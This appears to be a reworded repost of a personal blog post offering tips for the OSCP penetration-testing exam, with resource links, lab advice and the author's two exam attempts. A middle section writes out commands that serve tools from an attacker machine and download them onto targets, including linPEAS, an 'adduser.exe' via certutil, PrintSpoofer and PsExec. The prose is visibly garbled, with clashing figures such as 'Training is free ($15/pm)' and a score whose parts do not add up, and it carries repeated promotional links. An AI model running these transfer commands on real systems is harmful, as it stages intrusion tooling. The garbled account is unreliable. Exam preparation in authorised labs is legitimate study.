passyourcert24

May 31, 20228 min read

Way To Pass OSCP Exam 2022

Original Content Source: https://medium.com/@passyourcert24/way-to-pass-oscp-exam-2022-3b6b36708148

These ways will help you to pass OSCP exam because it's important you must know the tips before giving this difficult exam...

An OSCP has demonstrated the capacity to utilize persistence, creativity and sensitivity to spot weaknesses and then execute coordinated attacks while under strict time limits. OSCP Holders have proven they are able to think outside of the box, while managing resources and time.

Time Management

It's a long time to be (if it's a good chance) in the labs, right? Plus, you'll be watching and reading the official materials, which together are worth 100 hours plus. In addition, any other third-party resources that you can add to the mix to increase your knowledge! This certification is an endurance race for sure. There's a reason Offensive Security now offers a 24/7 PWK lab access and 2 test try bundles!

There's plenty of excellent write ups [1][2][3][4] therefore I will be brief and straight to the most helpful sources I found when working on the version 2020 of the OSCP.

[1] JohnJHacking

[2] Aana-Khalil

[3] FalconSpy

[4] TJNull

Technical Note Taking

This is crucial to the learning process in general. Record everything and all steps when you are done in all boxes! The more precise your record is, the more accurate. You may need to look over a box that you opened a few weeks or months ago, so it's worth it. I use OneNote to keep my notes. It synchronizes with the cloud on all of my gadgets, and allows me to take photos with ease. I utilized OneNote to keep track of every box I opened.

I created OneNote according to the following steps:

Created an empty box "template" that you can set as default. Pages that are newly created will use this template default.
Change the font's default to one that resembles Consolas to keep output from Kali.
Create tables and insert them into Console commands, or for output.

This has saved me several cycles and also helps to establish your approach.

Create Your Own Cheat Sheets

There are a lot of good sources available in this section. Avoid the temptation of using multiple cheat sheets instead, start making your own. In the beginning, you will be making a few boxes using aid from these sheets and incorporate commands and save files into your own. Build more resiliency on your own and then expand it as you take on boxes.

The best of the most popular

PayloadsAllTheThings Linux Priv-Esc
Pass OSCP Exam Blog by https://passyourcert.net/blog/
PayloadsAllTheThings Windows Priv-Esc
https://github.com/danielmiessler/SecLists
https://book.hacktricks.xyz/pentesting-methodology
https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html
https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/web-tool-wfuzz.md
https://blog.thehackingnomad.com/

For each box you open as well as the command you performed (and verified) make sure you keep it up to date. Learning how to use the tools and interpret the output is crucial. To give you an idea of what I did, here's how it resulted, not the most impressive, but not the most perfect. I employed Sublime Text with layout and tab grouping. Keep the "Workspace" to ensure that you do not lose your layout/tabs, and ensure that you connect these documents to any cloud-based service like Google Drive. Make use of the different Sublime syntax highlighters in order to keep it easier to see.

Arsenal Repository

Start putting together tools you've personally used to create a single directories within your Kali host, which you can quickly mount/serve and then pull down to the next machine you are working on. Without listing them all, here are some v.useful priv esc tools are listed below.

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
https://github.com/itm4n/PrivescCheck
https://github.com/Anon-Exploiter/SUID3NUM

The most popular method I can use to pull them to the ground (covered within the OSCP materials );

sudo python -m SimpleHTTPServer 80

then

wget http://192.168.19.44/linPEAS.sh

certutil.exe -urlcache -f http://192.168.119.187:80/adduser.exe add.exe

or via SMB

sudo /usr/bin/impacket-smbserver tools /home/kali/OSCP/web/ -port 443

sudo /usr/bin/impacket-smbserver -smb2support tools /home/kali/OSCP/web/

Copy it over UNC

copy \\192.168.49.211\tools\PrintSpoofer.exe p.exe

copy \\192.168.49.211\tools\winPEAS64.exe w.exe

copy \\192.168.49.211\tools\PsExec.exe ps.exe

Console Ninja

I'm not able enough to recommend an excellent terminator window manager. I've tried Terminator with customized shortcuts that split and split horizontally. There will be multiple windows and eventually become lost. It's all about managing as well as less pressure.

Masters Of The Game

They are without doubt the most comprehensive sources for CTF walkthroughs that I've found. Are you stuck? Keyword search any of these sites to get directly to a walkthrough or video that is relatable. This could provide you with the idea of gaining an initial shell, or pivot point.

OSCP Lab Networks

In hindsight, I'd have added more boxes to HTB/PG prior to going into the labs in order to develop my method and to improve my tooling and fully benefit from. Highly recommended by members of the public are TJ Null's box List Practice with a few of the HTB OSCP Style boxes prior to. If you're stuck, visit the website of Rana-Khalil for walkthroughs.

It's a bit of a catch-22. You may need official OSCP materials to master the fundamentals in the beginning. You should aim to make use of all of the time you can in the labs as much as you can, which is why I skipped the exercises in PDF and resigned the 5 points.

Make sure you get the maximum you can afford. I was lucky enough to be able to secure 90 days at the passyourcert lab, despite having slow beginnings and missed out for a half-week. Utilize HTB/PG/TryHackMe for a fundamental methodology and a list of commands that you feel familiar with. After that, you can jump in the laboratory.

Do not forget to use OSCP's official OSCP forums you've received access to. Tips and spoilers are readily accessible to be warned of.

PassYourCert is great for telling you where to start (I did not see this / wasn't created when I started) - PWK-Labs-Learning-Path

The final goal of the Learning Path machines should provide an individual student in PWK with confidence and skills to take on the rest of our extensive labs

I wanted to know more about pivoting/lateral movements and the risk of compromising Active Directory environments so went after the first. I didn't see some of the essential "easy" box.

Finally, I was able to get it done;

3/3 networks unlocked.
Both AD environments have labs that are compromised.
27 boxes popped.

OffSec's Proving Grounds

Offensive Security Proving Grounds (PG) are a new network to practice penetration testing using real-world, exploitable vectors. With the introduction to Play and Practice, we now have four options that satisfy your needs.

https://passyourcert.net/oscp-online-training-and-certification/

Offsec's take on HTB however, comes with more realistic, dedicated, CTF style boxes as well as an official walkthrough and hint system. PG also contains some of the most popular 'OSCP' similar to Vulnhub boxes, however the paid subscription provides access to some of the older "exam" boxes even though they aren't mentioned in the official press.

There are 3 tips per box to guide you on the path with enumeration and privilege escalation, as well as complete write-ups for each box, but you will have to wait 1.5hrs to gain access and can only access one per day.

If you are able to root a system, it will not grant access to the walkthrough, which is very disappointing. I decided not to send my root flag in order to access the walkthrough, and risk the value of my "virtual" point. This allowed me to establish the commands and procedures.
I was able to find some of the ratings in the boxes were a bit out of alignment. There are some intermediates that are very difficult and "Try harder" a.k.a 25pters was easier than I was expecting.

The labs were having a lot of issues (VPN mostly) at the time I signed up in January. The team has recently moved from Rocket Chat to Discord for community assistance.

I did the PG Practice for 3 months and would highly recommend it.

Play will be the no-cost level, however it is limited to 3hrs each day.
Training is free ($15/pm) Unlimited time, OffSec-designed devices and several exam-like boxes.

TJ Null Offsec Community Manager Practice suggestions.

Complementary Courses

The official materials are perfect. Offsec modified their Buffer Overflow section to reflect the 2020 edition, so when something doesn't seem to be sinking in look for a different explanation, then return to the official materials.

These were affordable and highly suggested by the infosec community.

Linux Privilege Escalation for Beginners
Windows Privilege Escalation for Beginners

It was developed by Heath Adams a.k.a. "The Cyber Mentor". They are up-to-date with PS20 each. Ideal to connect onto your AirPlay enabled TV and do an extra set of learning experiences between your day-to-day activities or in my case.

I was very satisfied with TryHackMe also - see below.

The Dreaded BoF

Perhaps the most difficult and difficult, yet one of the most straightforward points of the test. You must master the concepts and apply it to the numerous examples on the internet to confirm and strengthen your approach.

BoF BoF Section has been revised for 2020. It also it provides an excellent foundation to apply it to a variety of examples available;

TryHackMe BoF

https://tryhackme.com/room/bufferoverflowprep

This will assist you build a Python template for use.
OSCP Style binary that includes 10 examples
A free Windows 7 VM to spin up, add additional binaries and then practice. Included are Immunity, Mona and Python already installed.

BoF's I Completed;

SyncBreeze
VulnApp1(OSCP)
TryHackMe OSCPx5
dostackbufferoverflowgood
BrainPan
vulnserver

BoF Methodology

I made 3 templates using the following steps:

Basic Steps;

FUZZ THE APPLICATION
FINDING THE EIP OFFSET
CONTROL THE EIP
CHECK FOR BAD CHARACTERS
FINDING A RETURN ADDRESS - JMP ESP
SHELL CODE GENERATION
Communities and Support

It is always a good idea to help you learn whether it's soliciting help or providing assistance to other people. A majority of the containers for labs can be opened with a variety of methods and, trust me when I say that you'll get stuck. So, take a note when you really need. Find a balance that is healthy and put some effort into.

The official OSCP forums (included in the OSCP membership)
https://forums.offensive-security.com/
The official OSCP Discord Server (included with your OSCP registration)
https://discord.gg/AXrhh5Sr4U
Reddit OSCP
https://www.reddit.com/r/oscp/
Discord OSCP Unofficial "InfosecPrep"
https://discord.gg/k9fC77rddw

My Exam Experiences (x2)

My first attempt failed. There's no love lost there. Here's a quick overview;

Exam Experience 1: Finished with 45/100 (25pt 10pt, 10pt, as well as 10pt for user). The exam started at 0500 UTC. It took 45 minutes for the proctor to confirm. The initial attack was with the BoF and then 10 points owned and user shells at 20pt in 5/6 hours. Then I was a rabbit-hole to the point that I contacted support to confirm that the box wasn't in fact b0rked! The short answer is not. At some point, I ran out of ideas and ended up at 22 hours. Although I failed, it was a great learning experience, so I set out to do it again.

Lessons learnt:

I didn't have a good night's sleep prior and later than normal time to start was a bad idea.
The initial enumeration of web-based apps was not good.
My breaks were often frequent and I was able to stay hydrated for the majority of the time. It's inevitable to run into a brick wall, but you won't!
Possible linux priv-esc weaknesses identified.
Tired of being mentally exhausted and staying up till the closing. The party ended at 2am with no sleep.
Avoid rabbit holes. It's easier said than done.

Exam Experience 2: Passed with 80/100 (both 20pts, 25pts and 10pt). The plan was changed and I aimed at initially the 20pters. A new start time for the afternoon was set at 1500hrs UTC. Enumerated well , and had dinner in between. Around 2300hrs, I got my first win on the 20pter. Went to bed at 2am. Slept for about 5 hours. The alarm went off at 7am. I am scoring points almost every hour till 2hrs prior to the end of my. My progression was 20pt > 25pt BoF 10-pt >25pt.